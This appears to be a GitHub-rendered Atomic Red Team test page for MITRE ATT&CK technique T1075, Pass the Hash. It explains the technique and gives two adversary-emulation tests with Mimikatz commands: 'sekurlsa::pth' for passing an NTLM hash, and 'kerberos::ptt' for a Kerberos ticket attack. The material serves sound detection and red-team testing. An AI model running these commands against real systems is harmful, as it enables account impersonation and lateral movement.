Skip to content

Latest commit

 

History

History
53 lines (37 loc) · 1.98 KB

T1075.md

File metadata and controls

53 lines (37 loc) · 1.98 KB

T1075 - Pass the Hash

Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)

Atomic Tests


Atomic Test #1 - Mimikatz Pass the Hash

Note: must dump hashes first Reference

Supported Platforms: Windows

Inputs

Name Description Type Default Value
user_name username string Administrator
domain domain string atomic.local
ntlm ntlm hash string cc36cf7a8514893efccd3324464tkg1a

Run it with command_prompt!

mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}


Atomic Test #2 - Mimikatz Kerberos Ticket Attack

Similar to PTH, but attacking Kerberos

Supported Platforms: Windows

Inputs

Name Description Type Default Value
user_name username string Administrator
domain domain string atomic.local

Run it with command_prompt!

mimikatz # kerberos::ptt #{user_name}@#{domain}